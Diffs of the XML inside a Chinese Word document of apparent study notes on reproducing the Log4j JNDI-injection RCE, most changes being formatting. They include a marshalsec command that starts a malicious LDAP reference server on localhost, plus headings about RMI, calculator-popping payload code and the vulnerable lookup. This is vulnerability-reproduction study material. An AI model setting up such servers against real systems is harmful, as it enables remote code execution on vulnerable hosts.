--- a/src/main/java/summary/security/fuxian/中间件/Log4j rce代码原理.docx
+++ b/src/main/java/summary/security/fuxian/中间件/Log4j rce代码原理.docx
@@ -3,11 +3,6 @@
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:cx="http://schemas.microsoft.com/office/drawing/2014/chartex" xmlns:cx1="http://schemas.microsoft.com/office/drawing/2015/9/8/chartex" xmlns:cx2="http://schemas.microsoft.com/office/drawing/2015/10/21/chartex" xmlns:cx3="http://schemas.microsoft.com/office/drawing/2016/5/9/chartex" xmlns:cx4="http://schemas.microsoft.com/office/drawing/2016/5/10/chartex" xmlns:cx5="http://schemas.microsoft.com/office/drawing/2016/5/11/chartex" xmlns:cx6="http://schemas.microsoft.com/office/drawing/2016/5/12/chartex" xmlns:cx7="http://schemas.microsoft.com/office/drawing/2016/5/13/chartex" xmlns:cx8="http://schemas.microsoft.com/office/drawing/2016/5/14/chartex" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:aink="http://schemas.microsoft.com/office/drawing/2016/ink" xmlns:am3d="http://schemas.microsoft.com/office/drawing/2017/model3d" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:oel="http://schemas.microsoft.com/office/2019/extlst" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16du="http://schemas.microsoft.com/office/word/2023/wordml/word16du" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:t>L</w:t>
       </w:r>
@@ -63,27 +58,24 @@
         <w:t>Apache Log4j 2.x &lt;= 2.15.0-rc1</w:t>
       </w:r>
     </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>复现</w:t>
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:t>L</w:t>
@@ -166,13 +158,7 @@
       </w:r>
     </w:p>
     <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
     <w:p>
       <w:r>
         <w:rPr>
@@ -182,18 +168,13 @@
       </w:r>
     </w:p>
     <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="4D4D4D"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>1</w:t>
+        <w:t xml:space="preserve">1389 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -201,7 +182,15 @@
           <w:color w:val="4D4D4D"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>38</w:t>
+        <w:t>指</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:color w:val="4D4D4D"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>LDAP</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -209,14 +198,51 @@
           <w:color w:val="4D4D4D"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">9 </w:t>
-      </w:r>
+        <w:t>服务的端口</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>marshalsec.jndi</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>.LDAPRefServer</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> http://127.0.0.1/css/#ExportObject 1389</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve">开启RMI服务 </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="4D4D4D"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+        <w:t xml:space="preserve">1099 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:color w:val="4D4D4D"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>指</w:t>
       </w:r>
       <w:r>
@@ -225,7 +251,7 @@
           <w:color w:val="4D4D4D"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>LDAP</w:t>
+        <w:t>RMI</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -254,83 +280,6 @@
         <w:t xml:space="preserve"> http://127.0.0.1/css/#ExportObject 1389</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve">开启RMI服务 </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="4D4D4D"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">1099 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="4D4D4D"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>指</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
-          <w:color w:val="4D4D4D"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>RMI</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
-          <w:color w:val="4D4D4D"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>服务的端口</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t xml:space="preserve">java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:t>marshalsec.jndi</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:t>.LDAPRefServer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> http://127.0.0.1/css/#ExportObject 1389</w:t>
-      </w:r>
-    </w:p>
     <w:p/>
     <w:p/>
     <w:p>
@@ -355,6 +304,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="078AB9DC" wp14:editId="67F1B90E">
             <wp:extent cx="5274310" cy="832485"/>
@@ -402,6 +354,9 @@
     </w:p>
     <w:p>
       <w:r>
+        <w:rPr>
+          <w:noProof/>
+        </w:rPr>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="548A7941" wp14:editId="182C9036">
             <wp:extent cx="5274310" cy="796925"/>
@@ -564,7 +519,14 @@
           <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
-        <w:t>攻击者的恶意代码 弹出计算器</w:t>
+        <w:t>先编写</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:color w:val="000000" w:themeColor="text1"/>
+        </w:rPr>
+        <w:t>恶意代码 弹出计算器</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -950,6 +912,15 @@
           <w:sz w:val="24"/>
         </w:rPr>
         <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
+          <w:color w:val="CC7832"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
       <w:r>
@@ -986,19 +957,6 @@
           <w:sz w:val="24"/>
         </w:rPr>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-          <w:b/>
-          <w:bCs/>
-          <w:i/>
-          <w:iCs/>
-          <w:color w:val="5067AA"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">            </w:t>
       </w:r>
       <w:r>
@@ -2497,7 +2455,6 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
@@ -2510,6 +2467,7 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
@@ -2553,7 +2511,6 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
@@ -2568,7 +2525,6 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
@@ -2577,12 +2533,16 @@
       <w:pPr>
         <w:rPr>
           <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="000000" w:themeColor="text1"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>复现效果</w:t>
       </w:r>
@@ -2590,12 +2550,12 @@
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:noProof/>
           <w:color w:val="000000" w:themeColor="text1"/>
         </w:rPr>
         <w:drawing>
@@ -2691,17 +2651,19 @@
       </w:r>
       <w:proofErr w:type="spellEnd"/>
     </w:p>
+    <w:p/>
     <w:p>
       <w:pPr>
         <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>漏洞源码：</w:t>
       </w:r>
@@ -2759,20 +2721,8 @@
         <w:t>ookup接口直接将用户传来的数据解析执行</w:t>
       </w:r>
     </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
+    <w:p/>
+    <w:p/>
     <w:sectPr>
       <w:pgSz w:w="11906" w:h="16838"/>
       <w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="851" w:footer="992" w:gutter="0"/>

--- a/src/main/java/summary/security/fuxian/中间件/Log4j rce代码原理.docx
+++ b/src/main/java/summary/security/fuxian/中间件/Log4j rce代码原理.docx
@@ -40,6 +40,33 @@
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>（JNDI注入）</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>直接开启</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>ldap</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>执行RCE</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -833,6 +860,7 @@
           <w:kern w:val="0"/>
           <w:sz w:val="24"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>{</w:t>
       </w:r>
       <w:r>
@@ -912,15 +940,6 @@
           <w:sz w:val="24"/>
         </w:rPr>
         <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
-          <w:color w:val="CC7832"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="24"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">        </w:t>
       </w:r>
       <w:r>
